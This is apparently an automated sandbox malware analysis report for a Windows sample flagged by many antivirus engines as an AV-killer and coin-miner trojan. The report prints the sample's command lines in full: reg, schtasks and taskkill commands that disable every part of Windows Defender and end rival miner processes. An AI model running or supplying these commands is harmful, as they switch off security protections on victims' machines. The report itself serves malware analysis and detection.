Category | Machine | Started | Completed |
---|---|---|---|
FILE | s1_win7_x6402 | April 14, 2021, 6:14 p.m. | April 14, 2021, 6:16 p.m. |
-
-
cmd.exe "C:\Windows\sysnative\cmd.exe" /c "C:\Users\test22\AppData\Local\Temp\FE9C.tmp\FE9D.tmp\FE9E.bat C:\Users\test22\AppData\Local\Temp\fix.exe"
2864-
taskkill.exe taskkill /F /IM ati_service.exe
4636 -
taskkill.exe taskkill /F /IM sihost32.exe
3800 -
taskkill.exe taskkill /F /IM sihost86.exe
2848 -
taskkill.exe taskkill /F /IM sihost64.exe
8400 -
taskkill.exe taskkill /F /IM nslookup.exe
7772 -
taskkill.exe taskkill /F /IM MSVSCService.exe
7532 -
taskkill.exe taskkill /F /IM mscvs.exe
5272 -
taskkill.exe taskkill /F /IM test.exe
1036 -
taskkill.exe taskkill /F /IM VSC_Host_Service.exe
3320 -
taskkill.exe taskkill /F /IM darkgenerationminer.exe
4104 -
taskkill.exe taskkill /F /IM nslookup.exe
7184 -
reg.exe reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
5704 -
reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
1032 -
reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
7276 -
reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
6584 -
reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
6316 -
reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
6848 -
reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
5176 -
reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
5012 -
reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
1536 -
reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
4472 -
reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
5676 -
reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
6188 -
reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f
4428 -
reg.exe reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
2316 -
reg.exe reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
5252 -
schtasks.exe schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
2364 -
schtasks.exe schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
5520 -
schtasks.exe schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
3824 -
schtasks.exe schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
8844 -
schtasks.exe schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
8520 -
reg.exe reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /f
5052 -
reg.exe reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f
7996 -
reg.exe reg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
5128 -
reg.exe reg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
4020 -
reg.exe reg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
2744 -
reg.exe reg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
2708 -
reg.exe reg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
2592 -
reg.exe reg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
2180 -
reg.exe reg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
1844 -
reg.exe reg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
1136
-
-
Name | Response | Post-Analysis Lookup |
---|---|---|
No hosts contacted. |
IP Address | Status | Action |
---|---|---|
172.217.25.14 | Active | Moloch |
Suricata Alerts
No Suricata Alerts
Suricata TLS
No Suricata TLS
section | .code |
packer | PureBasic 4.x -> Neil Hodgson |
file | C:\Users\test22\AppData\Local\Temp\FE9C.tmp\FE9D.tmp\FE9E.bat |
file | C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\agent.pyw - 바로 가기.lnk |
cmdline | schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable |
cmdline | schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable |
cmdline | schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable |
cmdline | schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable |
cmdline | "C:\Windows\sysnative\cmd.exe" /c "C:\Users\test22\AppData\Local\Temp\FE9C.tmp\FE9D.tmp\FE9E.bat C:\Users\test22\AppData\Local\Temp\fix.exe" |
cmdline | schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable |
wmi | SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "sihost32.exe") |
wmi | SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "MSVSCService.exe") |
wmi | SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "test.exe") |
wmi | SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "sihost64.exe") |
wmi | SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "sihost86.exe") |
wmi | SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "ati_service.exe") |
wmi | SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "darkgenerationminer.exe") |
wmi | SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "nslookup.exe") |
wmi | SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "mscvs.exe") |
wmi | SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "VSC_Host_Service.exe") |
section | {u'size_of_data': u'0x00003400', u'virtual_address': u'0x00012000', u'entropy': 7.110235506298322, u'name': u'.rdata', u'virtual_size': u'0x000033a0'} | entropy | 7.1102355063 | description | A section with a high entropy has been found | |||||||||
section | {u'size_of_data': u'0x00001600', u'virtual_address': u'0x00018000', u'entropy': 7.694836126735778, u'name': u'.rsrc', u'virtual_size': u'0x00001584'} | entropy | 7.69483612674 | description | A section with a high entropy has been found | |||||||||
entropy | 0.207865168539 | description | Overall entropy of this PE file is high |
description | Affect system registries | rule | win_registry | ||||||
description | Affect system token | rule | win_token | ||||||
description | Affect private profile | rule | win_files_operation | ||||||
description | (no description) | rule | DebuggerCheck__GlobalFlags | ||||||
description | (no description) | rule | DebuggerCheck__QueryInfo | ||||||
description | (no description) | rule | DebuggerHiding__Thread | ||||||
description | (no description) | rule | DebuggerHiding__Active | ||||||
description | (no description) | rule | DebuggerException__SetConsoleCtrl | ||||||
description | (no description) | rule | ThreadControl__Context | ||||||
description | (no description) | rule | SEH__vectored | ||||||
description | Checks if being debugged | rule | anti_dbg | ||||||
description | Bypass DEP | rule | disable_dep |
cmdline | reg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f |
cmdline | reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f |
cmdline | schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable |
cmdline | schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable |
cmdline | reg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f |
cmdline | reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f |
cmdline | taskkill /F /IM sihost64.exe |
cmdline | taskkill /F /IM darkgenerationminer.exe |
cmdline | taskkill /F /IM MSVSCService.exe |
cmdline | taskkill /F /IM sihost86.exe |
cmdline | reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f |
cmdline | reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f |
cmdline | schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable |
cmdline | reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f |
cmdline | C:\Windows\sysnative\cmd /c "C:\Users\test22\AppData\Local\Temp\FE9C.tmp\FE9D.tmp\FE9E.bat C:\Users\test22\AppData\Local\Temp\fix.exe" |
cmdline | reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f |
cmdline | reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f |
cmdline | reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f |
cmdline | reg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f |
cmdline | taskkill /F /IM mscvs.exe |
cmdline | reg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f |
cmdline | taskkill /F /IM test.exe |
cmdline | taskkill /F /IM ati_service.exe |
cmdline | reg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f |
cmdline | reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f |
cmdline | reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f |
cmdline | reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f |
cmdline | taskkill /F /IM sihost32.exe |
cmdline | reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f |
cmdline | taskkill /F /IM VSC_Host_Service.exe |
cmdline | reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f |
cmdline | schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable |
cmdline | reg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f |
cmdline | reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f |
cmdline | taskkill /F /IM nslookup.exe |
cmdline | reg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f |
cmdline | reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /f |
cmdline | reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f |
cmdline | reg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f |
cmdline | "C:\Windows\sysnative\cmd.exe" /c "C:\Users\test22\AppData\Local\Temp\FE9C.tmp\FE9D.tmp\FE9E.bat C:\Users\test22\AppData\Local\Temp\fix.exe" |
cmdline | reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f |
cmdline | schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable |
host | 172.217.25.14 |
registry | HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\SpyNet |
Bkav | W32.AIDetect.malware1 |
Elastic | malicious (high confidence) |
FireEye | Generic.mg.025e0b547c344ac7 |
Cylance | Unsafe |
Sangfor | Trojan.Win32.Save.a |
Cyren | W32/Trojan.IUNU-0892 |
Symantec | ML.Attribute.HighConfidence |
ESET-NOD32 | BAT/KillAV.NFF |
APEX | Malicious |
Cynet | Malicious (score: 100) |
Kaspersky | Trojan.Win32.Agent.xahlxv |
Paloalto | generic.ml |
McAfee-GW-Edition | BehavesLike.Win32.Generic.nh |
Sophos | ML/PE-A |
Jiangmin | Trojan.PowerShell.ev |
Kingsoft | Win32.Troj.Agent.(kcloud) |
Gridinsoft | Trojan.Win32.CoinMiner.vb!s1 |
Microsoft | Trojan:Script/Phonzy.A!ml |
Acronis | suspicious |
Malwarebytes | Trojan.AVKill |
Zoner | Trojan.Win32.73853 |
Rising | Malware.Heuristic!ET#100% (RDMK:cmRtazqvTOj24YHY3fvo4PROTNRA) |
Cybereason | malicious.126be5 |
Panda | Trj/Genetic.gen |
Qihoo-360 | HEUR/QVM05.1.92E2.Malware.Gen |
description | attempts to modify windows defender policies | registry | HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable | ||||||
description | attempts to modify windows defender policies | registry | HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting\DisableEnhancedNotifications | ||||||
description | attempts to modify windows defender policies | registry | HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\MpEngine\MpEnablePus | ||||||
description | attempts to modify windows defender policies | registry | HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection | ||||||
description | attempts to modify windows defender policies | registry | HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring | ||||||
description | attempts to modify windows defender policies | registry | HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware | ||||||
description | attempts to modify windows defender policies | registry | HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\SpyNet\SubmitSamplesConsent | ||||||
description | attempts to modify windows defender policies | registry | HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\SpyNet\DisableBlockAtFirstSeen | ||||||
description | attempts to modify windows defender policies | registry | HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiVirus | ||||||
description | attempts to modify windows defender policies | registry | HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring | ||||||
description | attempts to modify windows defender policies | registry | HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\SpyNet\SpynetReporting | ||||||
description | attempts to modify windows defender policies | registry | HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection | ||||||
description | attempts to disable windows defender | registry | HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WinDefend\Start |
service | WdNisDrv (regkey HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WdNisDrv\Start) |
service | WdFilter (regkey HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WdFilter\Start) |
service | WdNisSvc (regkey HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WdNisSvc\Start) |
service | WdBoot (regkey HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WdBoot\Start) |
service | WinDefend (regkey HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WinDefend\Start) |